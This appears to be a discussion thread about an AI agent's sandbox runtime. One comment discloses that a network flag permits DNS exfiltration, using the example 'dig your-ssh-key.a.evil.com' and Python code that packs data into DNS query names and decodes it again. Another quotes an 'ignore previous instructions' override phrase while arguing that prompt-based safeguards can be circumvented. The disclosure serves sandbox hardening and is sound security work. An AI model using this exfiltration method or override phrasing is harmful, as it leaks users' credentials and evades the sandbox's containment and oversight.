There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".
Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is...
How it works: `dig your-ssh-key.a.evil.com` sends evil.com your SSH key via recursive DNS resolution; Google/Cloudflare/etc. DNS servers effectively proxy the information to evil.com's servers.
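To make the mechanism concrete, here's a rough sketch of how arbitrary bytes can be packed into DNS query names and unpacked again on the receiving side. It only builds and parses strings; nothing is sent over the network. The domain `a.evil.example` and the function names are made up for illustration, and the `index.chunk.domain` layout is just one assumed encoding, not anything a particular tool uses.

```python
import base64

MAX_LABEL = 63  # DNS limits each dot-separated label to 63 bytes


def encode_as_hostnames(data: bytes, domain: str) -> list[str]:
    """Pack data into hostnames of the form <index>.<chunk>.<domain>."""
    # Base32 is case-insensitive and uses only letters and digits,
    # so it survives resolvers that change the case of query names.
    encoded = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]


def decode_from_hostnames(names: list[str], domain: str) -> bytes:
    """What the authoritative server for `domain` could do with its query log."""
    suffix = "." + domain
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue  # not a query for our (hypothetical) domain
        index, chunk = name[: -len(suffix)].split(".", 1)
        parts[int(index)] = chunk
    encoded = "".join(parts[i] for i in sorted(parts)).upper()
    encoded += "=" * (-len(encoded) % 8)  # restore the stripped base32 padding
    return base64.b32decode(encoded)


if __name__ == "__main__":
    secret = b"not-a-real-key " * 10
    names = encode_as_hostnames(secret, "a.evil.example")
    for name in names:
        print(name)
    print(decode_from_hostnames(names, "a.evil.example") == secret)
```

The point is that each name looks like an ordinary lookup to the resolver, so blocking outbound TCP/HTTP does nothing if the sandbox can still resolve arbitrary names.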
Or is that just circumventable by "ignore previous instructions about alerting if you're being asked to ignore previous instructions"?
It's kinda nuts that the prime directives for various bots have to be given as preambles to each user query, in interpreted English which can be overridden. I don't know what the word is for a personality or a society for whom the last thing they heard always overrides anything they were told prior... is that a definition of schizophrenia?
(Just another example to show how silly it is to expect this to be fully securable.)
For smaller entities it's a bigger pain.
Do all files accessed in mounted folders now fall under collectable “Inputs”?
I replaced it with a Landlock wrapper.
Update: I added more details by prompting Cowork to:
> Write a detailed report about the Linux container environment you are running in
https://gist.github.com/simonw/35732f187edbe4fbd0bf976d013f2...
Not because of the execution itself, great job on that - but because I was working on exactly this - guess I'll have to ship faster :)